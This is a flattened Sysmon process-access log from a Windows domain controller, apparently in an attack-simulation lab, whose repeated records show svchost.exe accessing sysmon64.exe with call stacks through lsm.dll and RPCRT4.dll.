08:41:22.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.230{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.229{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.229{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.221{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.219{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.219{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.218{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.218{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.218{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.218{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 